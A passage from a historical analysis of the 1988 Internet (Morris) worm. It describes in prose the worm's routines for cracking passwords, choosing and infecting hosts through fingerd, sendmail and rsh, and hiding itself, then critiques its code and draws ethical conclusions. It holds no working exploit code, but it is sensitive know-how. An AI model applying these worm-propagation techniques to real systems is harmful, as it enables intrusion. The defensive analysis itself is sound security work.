- 5.2.4. attack_user
-
- This routine was called after a user password was broken. It has
- some incorrect code and may not work properly on every
- architecture because a subroutine call was missing an argument.
- However, on Suns and VAXen, the code will work because the
- missing argument was supplied as an extra argument to the
- previous call, and the order of the arguments on the stack
- matches between the two routines. It was largely a coincidence
- that this worked. The routine attempted to open a .forward file
- in the the user's home directory, and then for each host and user
- name present in that file, it called the hul routine. It then did
- the same thing with the .rhosts file, if present, in the user's
- home directory.
-
- 5.2.5. checkother
-
- This routine was to see if another worm was present on this
- machine and is a companion routine to other_sleep. First, a
- random value was checked: with a probability of 1 in 7, the
- routine returned without ever doing anything\320these worms
- become immortal in the sense that they never again participated
- in the process of thinning out multiple local worms. Otherwise,
- the worm created a socket and tried to connect to the local
- ``worm port''\320 23357. If the connection was successful, an
- exchange of challenges was made to verify that the other side was
- actually a fellow worm. If so, a random value was written to the
- other side, and a value was read from the socket. If the sum of
- the value sent plus the value read was even, the local worm set
- its pleasequit variable to 1, thus marking it for eventual self-
- destruction. The socket was then closed, and the worm opened a
- new socket on the same port \(if it was not destined to self-
- destruct\) and set other_fd to that socket to listen for other
- worms. If any errors were encountered during this procedure, the
- worm involved set other_fd to -1 and it returned from the
- routine. This meant that any error caused the worm to be
- immortal, too.
-
- 5.2.6. crack_0
-
- This routine first scanned the /etc/hosts.equiv file, adding new
- hosts to the global list of hosts and setting the \257ags field
- to mark them as equivalent. Calls were made to name2host and
- getaddrs. Next, a similar scan was made of the /.rhosts file
- using the exact same calls. The code then called setpwent to open
- the /etc/passwd file. A loop was performed as long as passwords
- could be read: Every 10th entry, a call was made to other_sleep
- with a timeout of 0. For each user, an attempt was made to open
- the file .forward
- 14
- in the home directory of that user, and read the hostnames
- therein. These hostnames were also added to the host list and
- marked as equivalent. The encrypted password, home directory, and
- gecos field for each user was stored into the pwd structure.
- After all user entries were read, the endpwent routine was
- invoked, and the cmode variable was set to 1.
-
- 5.2.7. crack_1
-
- This routine tried to break passwords. It looped until all
- accounts had been tried, or until the next group of 50 accounts
- had been tested. In the loop: A call was made to other_sleep with
- a parameter of zero each time the loop index modulo 10 was zero
- \(i.e., every 10 calls\). Repeated calls were made to
- try_password with the values discussed earlier in \2474-8b. Once
- all accounts had been tried, the variable cmode was set to 2.
-
- 5.2.8. crack_2
-
- This routine used the mini-dictionary in an attempt to break user
- passwords \(see Appendix A\). The dictionary was first permuted
- \(using the permute\) call. Each word was decrypted in- place by
- XORing its bytes with 0x80. The decrypted word was then passed to
- the try_password routine for each user account. The word was then
- re-encrypted. A global index, named nextw was incremented to
- point to the next dictionary entry. The nextw index is also used
- in doit to determine if enough effort had been expended so that
- the worm could ``...go gently into that good night.'' When no
- more words were left, the variable cmode was set to 3. There are
- two interesting points to note in this routine: the reverse of
- these words were not tried, although that would seem like a
- logical thing to do, and all words were encrypted and decrypted
- in place rather than in a temporary buffer. This is less
- efficient than a copy while masking since no re-encryption ever
- needs to be done. As discussed in the next section, many examples
- of unnecessary effort such as this were present in the program.
- Furthermore, the entire mini-dictionary was decrypted all at once
- rather than a word at a time. This would seem to lessen the
- benefit of encrypting those words at all, since the entire
- dictionary would then be present in memory as plaintext during
- the time all the words were tried.
-
- 5.2.9. crack_3
-
- This was the last password cracking routine. It opened
- /usr/dict/words, and for each word found it called try_password
- against each account. If the first letter of the word was a
- capital, it was converted to lower case and retried. After all
- words were tried, the variable cmode was incremented and the
- routine returned. In this routine, no calls to other_sleep were
- interspersed, thus leading to processes that ran for a long time
- before checking for other worms on the local machine. Also of
- note, this routine did not try the reverse of words either!
-
- 5.2.10. cracksome
-
- This routine was a simple switch statement on an external
- variable named cmode and it implemented the five strategies
- discussed in \2474-8 of this paper. State zero called crack_0,
- state one called crack_1, state two called crack_2, and state
- three called crack_3. The default case simply returned.
-
- 5.2.11. crypt
-
- This routine took a key and a salt, then performed the UNIX
- password encryption function on a block of zero bits. The return
- value of the routine was a pointer to a character string of 13
- characters representing the encoded password. The routine was
- highly optimized and differs considerably from the standard
- library version of the same routine. It called the following
- routines: compkeys, mungE, des, and ipi. A routine, setupE, was
- also present and was associated with this code, but it was never
- referenced. It appears to duplicate the functionality of the
- mungE function.
-
- 5.2.12. h_addaddr
-
- This routine added alternate addresses to a host entry in the
- global list if they were not already present.
-
- 5.2.13. h_addname
-
- This routine added host aliases \(names\) to a given host entry.
- Duplicate entries were suppressed.
-
- 5.2.14. h_addr2host
-
- The host address provided to the routine was checked against each
- entry in the global host list to see if it was already present.
- If so, a pointer to that host entry was returned. If not, and if
- a parameter flag was set, a new entry was initialized with the
- argument address and a pointer to it was returned.
-
- 5.2.15. h_clean
-
- This routine traversed the host list and removed any entries
- marked as infected or immune \(leaving hosts not yet tried\).
-
- 5.2.16. h_name2host
-
- Just like h_addr2host except the comparison was done by name with
- all aliases.
-
- 5.2.17. ha
-
- This routine tried to infect hosts on remote networks. First, it
- checked to see if the gateways list had entries; if not, it
- called rt_init. Next, it constructed a list of all IP addresses
- for gateway hosts that responded to the try_telnet routine. The
- list of host addresses was randomized by permute. Then, for each
- address in the list so constructed, the address was masked with
- the value returned by netmaskfor and the result was passed to the
- attack_network routine. If an attack was successful, the routine
- exited early with a return value of TRUE.
-
- 5.2.18. hg
-
- This routine attempted to infect gateway machines. It first
- called rt_init to reinitialize the list of gateways, and then for
- each gateway it called the main infection routine, infect, with
- the gateway as an argument. As soon as one gateway was
- successfully infected, the routine returned TRUE.
-
- 5.2.19. hi
-
- This routine tried to infect hosts whose entries in the hosts
- list were marked as equivalent. The routine traversed the global
- host list looking for such entries and then calling infect with
- those hosts. A successful infection returned early with the value
- TRUE.
-
- 5.2.20. hl
-
- This routine was intended to attack hosts on directly-connected
- networks. For each alternate address of the current host, the
- routine attack_network was called with an argument consisting of
- the address logically and-ed with the value of netmask for that
- address. A success caused the routine to return early with a
- return value of TRUE.
-
- 5.2.21. hul
-
- This function attempted to attack a remote host via a particular
- user. It first checked to make sure that the host was not the
- current host and that it had not already been marked as infected.
- Next, it called getaddrs to be sure there was an address to be
- used. It examined the username for punctuation characters, and
- returned if any were found. It then called other_sleep with an
- argument of 1. Next, the code tried the attacks described in
- \2474-10. Calls were made to sendworm if either attack succeeded
- in establishing a shell on the remote machine.
-
- 5.2.22. if_init
-
- This routine constructed the list of interfaces using ioctl
- calls. In summary, it obtained information about each interface
- that was up and running, including the destination address in
- point-to-point links, and any netmask for that interface. It
- initialized the me pointer to the first non-loopback address
- found, and it entered all alternate addresses in the address
- list.
-
- 5.2.23. infect
-
- This was the main infection routine. First, the host argument was
- checked to make sure that it was not the current host, that it
- was not currently infected, and that it had not been determined
- to be immune. Next, a check was made to be sure that an address
- for the host could be found by calling getaddrs. If no address
- was found, the host was marked as immune and the routine returned
- FALSE. Next, the routine called other_sleep with a timeout of 1.
- Following that, it tried, in succession, calls to try_rsh,
- try_fingerd, and try_sendmail. If the calls to try_rsh or
- try_fingerd
-
- succeeded, the file descriptors established by those invocations
- were passed as arguments to the sendworm call. If any of the
- three infection attempts succeeded, infect returned early with a
- value of TRUE. Otherwise, the routine returned FALSE.
-
- 5.2.24. loadobject
-
- This routine read an object file into the objects structure in
- memory. The file was opened and the size found with a call to the
- library routine fstat. A buffer was malloc'd of the appropriate
- size, and a call to read was made to read the contents of the
- file. The buffer was encrypted with a call to xorbuf, then
- transferred into the objects array. The suffix of the name
- \(e.g., sun3.o, l1.c, vax.o\) was saved in a field in the
- structure, as was the size of the object.
-
- 5.2.25. makemagic
-
- The routine used the library random call to generate a random
- number for use as a challenge number. Next, it tried to connect
- to the telnet port \(#23\) of the target host, using each
- alternate address currently known for that host. If a successful
- connection was made, the library call getsockname was called to
- get the canonical IP address of the current host relative to the
- target. Next, up to 1024 attempts were made to establish a TCP
- socket, using port numbers generated by taking the output of the
- random number generator modulo 32767. If the connection was
- successful, the routine returned the port number, the file
- descriptor of the socket, the canonical IP address of the current
- host, and the challenge number.
-
- 5.2.26. netmaskfor
-
- This routine stepped through the interfaces array and checked the
- given address against those interfaces. If it found that the
- address was reachable through a connected interface, the netmask
- returned was the netmask associated with that interface.
- Otherwise, the return was the default netmask based on network
- type \(Class A, Class B, Class C\).
-
- 5.2.27. other_sleep
-
- This routine checked a global variable named other_fd. If the
- variable was less than zero, the routine simply called sleep with
- the provided timeout argument, then returned. Otherwise, the
- routine waited on a select system call for up to the value of the
- timeout. If the timeout expired, the routine returned. Otherwise,
- if the select return code indicated there was input pending on
- the other_fd descriptor, it meant there was another worm on the
- current machine. A connection was established and an exchange of
- ``magic'' numbers was made to verify identity. The local worm
- then wrote a random number \(produced by random\) to the other
- worm via the socket. The reply was read and a check was made to
- ensure that the response came from the localhost \(127.0.0.1\).
- The file descriptor was closed. If the random value sent plus the
- response was an odd number, the other_fd variable was set to -1
- and the pleasequit variable was set to 1. This meant that the
- local worm would die when conditions were right \(cf. doit \),
- and that it would no longer attempt to contact other worms on the
- local machine. If the sum was even, the other worm was destined
- to die.
-
- 5.2.28. permute
-
- This routine randomized the order of a list of objects. This was
- done by executing a loop once for each item in the list. In each
- iteration of the loop, the random number generator was called
- modulo the number of items in the list. The item in the list
- indexed by that value was swapped with the item in the list
- indexed by the current loop value \(via a call to bcopy\).
-
- 5.2.29. rt_init
-
- This initialized the list of gateways. It started by setting an
- external counter, ngateways, to zero. Next, it invoked the
- command ``/usr/ucb/netstat -r -n'' using a popen call. The code
- then looped while output was received from the netstat command: A
- line was read. A call to other_sleep was made with a timeout of
- zero. The input line was parsed into a destination and a gateway.
- If the gateway was not a valid IP address, or if it was the
- loopback address \(127.0.0.1\), it was discarded. The value was
- then compared against all the gateway addresses already known;
- duplicates were skipped. It was also compared against the list of
- local interfaces \(local networks\), and discarded if a
- duplicate. Otherwise, it was added to the list of gateways and
- the counter incremented.
-
- 5.2.30. scan_gateways
-
- First, the code called permute to randomize the gateways list.
- Next, it looped over each gateway or the first 20, whichever was
- less: A call was made to other_sleep with a timeout of zero. The
- gateway IP address was searched for in the host list; a new entry
- was allocated for the host if none currently existed. The gateway
- flag was set in the flags field of the host entry. A call was
- made to the library routine gethostbyaddr with the IP number of
- the gateway. The name, aliases and address fields were added to
- the host list, if not already present. Then a call was made to
- gethostbyname and alternate addresses were added to the host
- list. After this loop was executed, a second loop was started
- that did effectively the same thing as the first! There is no
- clear reason why this was done, unless it is a remnant of earlier
- code, or a stub for future additions.
-
- 5.2.31. send_message
-
- This routine made a call to random and 14 out of 15 times
- returned without doing anything. In the 15th case, it opened a
- stream socket to host ``ernie.berkeley.edu'' and then tried to
- send an uninitialized byte using the sendto call. This would not
- work \(using a UDP send on a TCP socket\).
-
- 5.2.32. sendworm
-
- This routine sent the worm code over a connected TCP circuit to a
- remote machine. First it checked to make sure that the objects
- table held a copy of the l1.c code \(see Appendix B\). Next, it
- called makemagic to get a local socket established and to
- generate a challenge string. Then, it encoded and wrote the
- script detailed previously in \2474-2a. Finally, it called
- waithit and returned the result code of that routine. The object
- files shipped across the link were decrypted in memory first by a
- call to xorbuf and then re-encrypted afterwards.
-
- 5.2.33. supports_rsh
-
- This routine determined if the target host, specified as an
- argument, supported the BSD- derived rsh protocol. It did this by
- creating a socket and attempting a TCP connection to port 514 on
- the remote machine. A timeout or connect failure caused a return
- of FALSE; otherwise, the socket was closed and the return value
- was TRUE.
-
- 5.2.34. supports_telnet
-
- This routine determined if a host was reachable and supported the
- telnet protocol \(i.e., was probably not a router or similar
- ``dumb'' box\). It was similar to supports_rsh in nature. The
- code established a socket, connected to the remote machine on
- port 23, and returned FALSE if an error or timeout occurred;
- otherwise, the socket was closed and TRUE was returned.
-
- 5.2.35. try_fingerd
-
- This routine tried to establish a connection to a remote finger
- daemon on the given host by connecting to port 79. If the
- connection succeeded, it sent across an overfull buffer as
- described in \2474-8b and waited to see if the other side became
- a shell. If so, it returned the file descriptors to the caller;
- otherwise, it closed the socket and returned a failure code.
-
- 5.2.36. try_password
-
- This routine called crypt with the password attempt and compared
- the result against the encrypted password in the pwd entry for
- the current user. If a match was found, the unencrypted password
- was copied into the pwd structure, and the routine attack_user
- was invoked.
-
- 5.2.37. try_rsh
-
- This function created two pipes and then forked a child process.
- The child process attempted to rexec a remote shell on the host
- specified in the parameters, using the specified username and
- password. Then the child process tried to invoke the rsh command
- by attempting to run, in order, ``/usr/ucb/rsh,''
- ``/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote shell
- succeeded, the function returned the file descriptors of the open
- pipe. Otherwise, it closed all file descriptors, killed the child
- with a SIGKILL, and reaped it with a call to wait3.
-
- 5.2.38. try_sendmail
-
- This routine attempted to establish a connection to the SMTP port
- \(#25\) on the remote host. If successful, it conducted the
- dialog explained in \2474-2b. It then called the waithit routine
- to see if the infection ``took.'' Return codes were checked after
- each line was transmitted, and if a return code indicated a
- problem, the routine aborted after sending a ``quit'' message.
-
- 5.2.39. waithit
-
- This function acted as the bootstrap server for a vector program
- on a remote machine. It waited for up to 120 seconds on the
- socket created by the makemagic routine, and if no connection was
- made it closed the socket and returned a failure code. Likewise,
- if the first thing received was not the challenge string shipped
- with the bootstrap program, the socket was closed and the routine
- returned. The routine decrypted each object file using xorbuf and
- sent it across the connection to the vector program \(see
- Appendix B\). Then a script was transmitted to compile and run
- the vector. This was described in \2474-4. If the remote host was
- successfully infected, the infected flag was set in the host
- entry and the socket closed. Otherwise, the routine sent rm
- command strings to delete each object file. The function returned
- the success or failure of the infection.
-
- 5.2.40. xorbuf
-
- This routine was somewhat peculiar. It performed a simple
- encryption/decryption function by XORing the buffer passed as an
- argument with the first 10 bytes of the xorbuf routine itself!
- This code would not work on a machine with a split I/D space or
- on tagged architectures.
-
- 6. Analysis of the Code
-
- 6.1. Structure and Style
-
- An examination of the reverse-engineered code of the worm is
- instructive. Although it is not the same as reading the original
- code, it does reveal some characteristics of the author\(s\). One
- conclusion that may surprise some people is that the quality of
- the code is mediocre, and might even be considered poor. For
- instance, there are places where calls are made to functions with
- either too many or too few arguments. Many routines have local
- variables that are either never used, or are potentially used
- before they are initialized. In at least one location, a struct
- is passed as an argument rather than the address of the struct.
- There is also dead code, as routines that are never referenced,
- and as code that cannot be executed because of conditions that
- are never met \(possibly bugs\). It appears that the author\(s\)
- never used the lint utility on the program. At many places in the
- code, there are calls on system routines and the return codes are
- never checked for success. In many places, calls are made to the
- system heap routine, malloc and the result is immediately used
- without any check. Although the program was configured not to
- leave a core file or other evidence if a fatal failure occurred,
- the lack of simple checks on the return codes is indicative of
- sloppiness; it also suggests that the code was written and run
- with minimal or no testing. It is certainly possible that some
- checks were written into the code and elided subject to
- conditional compilation flags. However, there would be little
- reason to remove those checks from the production version of the
- code. The structures chosen for some of the internal data are
- also revealing. Everything was represented as linked lists of
- structures. All searches were done as linear passes through the
- appropriate list. Some of these lists could get quite long and
- doubtless that considerable CPU time was spent by the worm just
- maintaining and searching these lists. A little extra code to
- implement hash buckets or some form of sorted lists would have
- added little overhead to the program, yet made it much more
- efficient \(and thus quicker to infect other hosts and less
- obvious to system watchers\). Linear lists may be easy to code,
- but any experienced programmer or advanced CS student should be
- able to implement a hash table or lists of hash buckets with
- little difficulty. Some effort was duplicated in spots. An
- example of this was in the code that tried to break passwords.
- Even if the password to an account had been found in an earlier
- stage of execution, the worm would encrypt every word in the
- dictionary and attempt a match against it. Similar redundancy can
- be found in the code to construct the lists of hosts to infect.
- There are locations in the code where it appears that the
- author\(s\) meant to execute a particular function but used the
- wrong invocation. The use of the UDP send on a TCP socket is one
- glaring example. Another example is at the beginning of the
- program where the code sends a KILL signal to its parent process.
- The surrounding code gives strong indication that the user
- actually meant to do a killpg instead but used the wrong call.
- The one section of code that appears particularly well-thought-
- out involves the crypt routines used to check passwords. As has
- been noted in [Seel88], this code is nine times faster than the
- standard Berkeley crypt function. Many interesting modifications
- were made to the algorithm, and the routines do not appear to
- have been written by the same author as the rest of the code.
- Additionally, the routines involved have some support for both
- encryption anddecryption\320even though only encryption was
- needed for the worm. This supports the assumption that this
- routine was written by someone other than the author\(s\) of the
- program, and included with this code. It would be interesting to
- discover where this code originated and how it came to be in the
- Worm program. The program could have been much more virulent had
- the author\(s\) been more experienced or less rushed in her/his
- coding. However, it seems likely that this code had been
- developed over a long period of time, so the only conclusion that
- can be drawn is that the author\(s\) was sloppy or careless \(or
- both\), and perhaps that the release of the worm was premature.
-
- 6.2. Problems of Functionality
-
- There is little argument that the program was functional. In
- fact, we all wish it had been less capable! However, we are lucky
- in the sense that the program had flaws that prevented it from
- operating to the fullest. For instance, because of an error, the
- code would fail to infect hosts on a local area network even
- though it might identify such hosts. Another example of
- restricted functionality concerns the gathering of hostnames to
- infect. As noted already, the code failed to gather host names
- >From user .rhosts files early on. It also did not attempt to
- collect host names from other user and system files containing
- such names \(e.g., /etc/hosts.lpd\). Many of the operations could
- have been done ``smarter.'' The case of using linear structures
- has already been mentioned. Another example would have been to
- sort user passwords by the salt used. If the same salt was
- present in more than one password, then all those passwords could
- be checked in parallel as a single pass was made through the
- dictionaries. On our machine, 5% of the 200 passwords share the
- same salts, for instance. No special advantage was taken if the
- root password was compromised. Once the root password has been
- broken, it is possible to fork children that set their uid and
- environment variables to match each designated user. These
- processes could then attempt the rsh attack described earlier in
- this report. Instead, root is treated as any other account. It
- has been suggested to me that this treatment of root may have
- been a conscious choice of the worm author\(s\). Without knowing
- the true motivation of the author, this is impossible to decide.
- However, considering the design and intent of the program, I find
- it difficult to believe that such exploitation would have been
- omitted if the author had thought of it. The same attack used on
- the finger daemon could have been extended to the Sun version of
- the program, but was not. The only explanations that come to mind
- why this was not done are that the author lacked the motivation,
- the ability, the time, or the resources to develop a version for
- the Sun. However, at a recent meeting, Professor Rick Rashid of
- Carnegie-Mellon University was heard to claim that Robert T.
- Morris, the alleged author of the worm, had revealed the fingerd
- bug to system administrative staff at CMU well over a year ago.
- 15
- Assuming this report is correct and the worm author is indeed Mr.
- Morris, it is obvious that there was sufficient time to construct
- a Sun version of the code. In fact, I asked three Purdue graduate
- students \(Shawn D. Ostermann, Steve J. Chapin, and Jim N.
- Griffoen to develop a Sun 3 version of the attack, and they did
- so in under three hours. The Worm author certainly must have had
- access to Suns or else he would not have been able to provide Sun
- binaries to accompany the operational worm. Motivation should
- also not be a factor considering everything else present in the
- program. With time and resources available, the only reason I
- cannot immediately rule out is that he lacked the knowledge of
- how to implement a Sun version of the attack. This seemsunlikely,
- but given the inconsistent nature of the rest of the code, it is
- certainly a possibility. However, if this is the case, it raises
- a new question: was the author of the Worm the original author of
- the VAX fingerd attack? Perhaps the most obvious shortcoming of
- the code is the lack of understanding about propagation and load.
- The reason the worm was spotted so quickly and caused so much
- disruption was because it replicated itself exponentially on some
- networks, and because each worm carried no history with it.
- Admittedly, there was a check in place to see if the current
- machine was already infected, but one out of every seven worms
- would never die even if there was an existing infestation.
- Furthermore, worms marked for self-destruction would continue to
- execute up to the point of having made at least one complete pass
- through the password file. Many approaches could have been taken
- by the author\(s\) to slow the growth of the worm or prevent
- reinfestation; little is to be gained from explaining them here,
- but their absence from the worm program is telling. Either the
- author\(s\) did not have any understanding of how the program
- would propagate, or else she/he/they did not care; the existence
- in the Worm of mechanisms to limit growth tends to indicate that
- it was a lack of understanding rather than indifference. Some of
- the algorithms used by the Worm were reasonably clever. One in
- particular is interesting to note: when trying passwords from the
- built-in list, or when trying to break into connected hosts, the
- worm would randomize the list of candidates for trial. Thus, if
- more than one worm were present on the local machine, they would
- be more likely to try candidates in a different order, thus
- maximizing their coverage. This implies, however \(as does the
- action of the pleasequit variable\) that the author\(s\) was not
- overly concerned with the presence of multiple worms on the same
- machine. More to the point, multiple worms were allowed for a
- while in an effort to maximize the spread of the infection. This
- also supports the contention that the author did not understand
- the propagation or load effects of the Worm. The design of the
- vector program, the ``thinning'' protocol, and the use of the
- internal state machine were all clever and non-obvious. The
- overall structure of the program, especially the code associated
- with IP addresses, indicates considerable knowledge of networking
- and the routines available to support it. The knowledge evidenced
- by that code would indicate extensive experience with networking
- facilities. This, coupled with some of the errors in the Worm
- code related to networking, further support the thesis that the
- author was not a careful programmer\320the errors in those parts
- of the code were probably not errors because of ignorance or
- inexperience.
-
- 6.3. Camouflage
-
- Great care was taken to prevent the worm program from being
- stopped. This can be seen by the caution with which new files
- were introduced into a machine, including the use of random
- challenges. It can be seen by the fact that every string compiled
- into the worm was encrypted to prevent simple examination. It was
- evidenced by the care with which files associated with the worm
- were deleted from disk at the earliest opportunity, and the
- corresponding contents were encrypted in memory when loaded. It
- was evidenced by the continual forking of the process, and the
- \(faulty\) check for other instances of the worm on the local
- host. The code also evidences precautions against providing
- copies of itself to anyone seeking to stop the worm. It sets its
- resource limits so it cannot dump a core file, and it keeps
- internal data encrypted until used. Luckily, there are other
- methods of obtaining core files and data images, and researchers
- were able to obtain all the information they needed to
- disassemble and reverse-engineer the code. There is no doubt,
- however, that the author\(s\) of the worm intended to make such a
- task as difficult as possible.
-
- 6.4. Specific Comments
-
- Some more specific comments are worth making. These are directed
- to particular aspects of the code rather than the program as a
- whole.
-
- 6.4.1. The sendmail attack
-
- Many sites tend to experience substantial loads because of heavy
- mail traffic. This is especially true at sites with mailing list
- exploders. Thus, the administrators at those sites have
- configured their mailers to queue incoming mail and process the
- queue periodically. The usual configuration is to set sendmail to
- run the queue every 30 to 90 minutes. The attack through sendmail
- would fail on these machines unless the vector program were
- delivered into a nearly empty queue within 120 seconds of it
- being processed. The reason for this is that the infecting worm
- would only wait on the server socket for two minutes after
- delivering the ``infecting mail.'' Thus, on systems with delayed
- queues, the vector process would not get built in time to
- transfer the main worm program over to the target. The vector
- process would fail in its connection attempt and exit with a
- non-zero status. Additionally, the attack through sendmail
- invoked the vector program without a specific path. That is, the
- program was invoked with ``foo'' instead of ``./foo'' as was done
- with the shell-based attack. As a result, on systems where the
- default path used by sendmail's shell did not contain the current
- directory \(``.''\), the invocation of the code would fail. It
- should be noted that such a failure interrupts the processing of
- subsequent commands \(such as the rm of the files\), and this may
- be why many system administrators discovered copies of the vector
- program source code in their /usr/tmp directories.
-
- 6.4.2. The machines involved
-
- As has already been noted, this attack was made only on Sun 3
- machines and VAX machines running BSD UNIX. It has been observed
- in at least one mailing list that had the Sun code been compiled
- with the -mc68010 flag, more Sun machines would have fallen
- victim to the worm. It is a matter of some curiosity why more
- machines were not targeted for this attack. In particular, there
- are many Pyramid, Sequent, Gould, Sun 4, and Sun i386 machines on
- the net.
- 16
- If binary files for those had also been included, the worm could
- have spread much further. As it was, some locations such as Ohio
- State were completely spared the effects of the worm because all
- their ``known'' machines were of a type that the worm could not
- infect. Since the author of the program knew how to break into
- arbitrary UNIX machines, it seems odd that he/she did not attempt
- to compile the program on foreign architectures to include with
- the worm.
-
- 6.4.3. Portability considerations
-
- The author\(s\) of the worm may not have had much experience with
- writing portable UNIX code, including shell scripts. Consider
- that in the shell script used to compile the vector, the
- following command is used: if [ -f sh ] The use of the [
- character as a synonym for the test function is not universal.
- UNIX users with experience writing portable shell files tend to
- spell out the operator test rather than rely on therebeing a link
- to a file named ``['' on any particular system. They also know
- that the test operator is built-in to many shells and thus faster
- than the external [ variant. The test invocation used in the worm
- code also uses the -f flag to test for presence of the file named
- sh. This provided us with the worm ``condom'' published Thursday
- night:
- 17
- creating a directory with the name sh in /usr/tmp causes this
- test to fail, as do later attempts to create executable files by
- that name. Experienced shell programmers tend to use the -e
- \(exists\) flag in circumstances such as this, to detect not only
- directories, but sockets, devices, named FIFOs, etc. Other
- colloquialisms are present in the code that bespeak a lack of
- experience writing portable code. One such example is the code
- loop where file units are closed just after the vector program
- starts executing, and again in the main program just after it
- starts executing. In both programs, code such as the following is
- executed: for \(i = 0; i < 32; i++\) close\(i\); The portable way
- to accomplish the task of closing all file descriptors \(on
- Berkeley-derived systems\) is to execute: for \(i = 0; i <
- getdtablesize\(\); i++\) close \(i\); or the even more efficient
- for \(i = getdtablesize\(\)-1; i >= 0; i--\) close\(i\); This is
- because the number of file units available \(and thus open\) may
- vary from system to system.
-
- 6.5. Summary
-
- Many other examples can be drawn from the code, but the points
- should be obvious by now: the author of the worm program may have
- been a moderately experienced UNIX programmer, but s/he was by no
- means the ``UNIX Wizard'' many have been claiming. The code
- employs a few clever techniques and tricks, but there is some
- doubt if they are all the original work of the Worm author. The
- code seems to be the product of an inexperienced or sloppy
- programmer. The person \(or persons\) who put this program
- together appears to lack fundamental insight into some
- algorithms, data structures, and network propagation, but at the
- same time has some very sophisticated knowledge of network
- features and facilities. The code does not appear to have been
- tested \(although anything other than unit testing would not be
- simple to do\), or else it was prematurely released. Actually, it
- is possible that both of these conclusions are correct. The
- presence of so much dead and duplicated code coupled with the
- size of some data structures \(such as the 20-slot object code
- array\) argues that the program was intended to be more
- comprehensive.
-
- 7. Conclusions
-
- It is clear from the code that the worm was deliberately designed
- to do two things: infect as many machines as possible, and be
- difficult to track and stop. There can be no question that this
- was in any way an accident, although its release may have been
- premature. It is still unknown if this worm, or a future version
- of it, was to accomplish any other tasks. Although an author has
- been alleged \(Robert T. Morris\), he has not publicly confessed
- nor has the matter been definitively proven. Considering the
- probability of both civil and criminal legal actions, a
- confession and an explanation are unlikely to be forthcoming any
- time soon. Speculation has centered on motivations as diverse as
- revenge, pure intellectual curiosity, and a desire to impress
- someone. This must remain speculation for the time being,
- however, since we do not have access to a definitive statement
- >From the author\(s\). At the least, there must be some question
- about the psychological makeup of someone who would build and run
- such software.
- 18
- Many people have stated that the authors of this code
- 19
- must have been ``computer geniuses'' of some sort. I have been
- bothered by that supposition since first hearing it, and after
- having examined the code in some depth, I am convinced that this
- program is not evidence to support any such claim. The code was
- apparently unfinished and done by someone clever but not
- particularly gifted, at least in the way we usually associate
- with talented programmers and designers. There were many bugs and
- mistakes in the code that would not be made by a careful,
- competent programmer. The code does not evidence clear
- understanding of good data structuring, algorithms, or even of
- security flaws in UNIX. It does contain clever exploitations of
- two specific flaws in system utilities, but that is hardly
- evidence of genius. In general, the code is not that impressive,
- and its ``success'' was probably due to a large amount of luck
- rather than any programming skill possessed by the author. Chance
- favored most of us, however. The effects of this worm were
- \(largely\) benign, and it was easily stopped. Had the code been
- tested and developed further by someone more experienced, or had
- it been coupled with something destructive, the toll would have
- been considerably higher. I can easily think of several dozen
- people who could have written this program, and not only done it
- with far fewer \(if any\) errors, but made it considerably more
- virulent. Thankfully, those individuals are all responsible,
- dedicated professionals who would not consider such an act. What
- we learn from this about securing our systems will help determine
- if this is the only such incident we ever need to analyze. This
- attack should also point out that we need a better mechanism in
- place to coordinate information about security flaws and attacks.
- The response to this incident was largely ad hoc, and resulted in
- both duplication of effort and a failure to disseminate valuable
- information to sites that needed it. Many site administrators
- discovered the problem from reading the newspaper or watching the
- television. The major sources of information for many of the
- sites affected seems to have been Usenet news groups and a
- mailing list I put together when the worm was first discovered.
- Although useful, these methods did not ensure timely, widespread
- dissemination of useful information \320 especially since they
- depended on the Internet to work! Over three weeks after this
- incident some sites are still not reconnected to the Internet.
-
- This is the second time in six months that a major panic has hit
- the Internet community.The first occurred in May when a rumor
- swept the community that a ``logic bomb'' had been planted in Sun
- software by a disgruntled employee. Many, many sites turned their
- system clocks back or they shut off their systems to prevent
- damage. The personnel at Sun Microsystems responded to this in an
- admirable fashion, conducting in-house testing to isolate any
- such threat, and issuing information to the community about how
- to deal with the situation. Unfortunately, almost everyone else
- seems to have watched events unfold, glad that they were not the
- ones who had to deal with the situation. The worm has shown us
- that we are all affected by events in our shared environment, and
- we need to develop better information methods outside the network
- before the next crisis. This whole episode should cause us to
- think about the ethics and laws concerning access to computers.
- The technology we use has developed so quickly it is not always
- simple to determine where the proper boundaries of moral action
- may be. Many senior computer professionals started their careers
- years ago by breaking into computer systems at their colleges and
- places of employment to demonstrate their expertise. However,
- times have changed and mastery of computer science and computer
- engineering now involves a great deal more than can be shown by
- using intimate knowledge of the flaws in a particular operating
- system. Entire businesses are now dependent, wisely or not, on
- computer systems. People's money, careers, and possibly even
- their lives may be dependent on the undisturbed functioning of
- computers. As a society, we cannot afford the consequences of
- condoning or encouraging behavior that threatens or damages
- computer systems. As professionals, computer scientists and
- computer engineers cannot afford to tolerate the romanticization
- of computer vandals and computer criminals. This incident should
- also prompt some discussion about distribution of security-
- related information. In particular, since hundreds of sites have
- ``captured'' the binary form of the worm, and since personnel at
- those sites have utilities and knowledge that enables them to
- reverse-engineer the worm code, we should ask how long we expect
- it to be beneficial to keep the code unpublished? As I mentioned
- in the introduction, at least five independent groups have
- produced reverse-engineered versions of the worm, and I expect
- many more have been done or will be attempted, especially if the
- current versions are kept private. Even if none of these versions
- is published in any formal way, hundreds of individuals will have
- had access to a copy before the end of the year. Historically,
- trying to ensure security of software through secrecy has proven
- to be ineffective in the long term. It is vital that we educate
- system administrators and make bug fixes available to them in
- some way that does not compromise their security. Methods that
- prevent the dissemination of information appear to be completely
- contrary to that goal. Last, it is important to note that the
- nature of both the Internet and UNIX helped to defeat the worm as
- well as spread it. The immediacy of communication, the ability to
- copy source and binary files from machine to machine, and the
- widespread availability of both source and expertise allowed
- personnel throughout the country to work together to solve the
- infection even despite the widespread disconnection of parts of
- the network. Although the immediate reaction of some people might
- be to restrict communication or promote a diversity of
- incompatible software options to prevent a recurrence of a worm,
- that would be entirely the wrong reaction. Increasing the
- obstacles to open communication or decreasing the number of
- people with access to in-depth information will not prevent a
- determined attacker\320it will only decrease the pool of
- expertise and resources available to fight such an attack.
- Further, such an attitude would be contrary to the whole purpose
- of having an open, research-oriented network. The Worm was caused
- by a breakdown of ethics as well as lapses in security\320a
- purely technological attempt at prevention will not address the
- full problem, and may just cause new difficulties.
-
- Acknowledgments
-
- Much of this analysis was performed on reverse-engineered
- versions of the worm code. The following people were involved in
- the production of those versions: Donald J. Becker of Harris
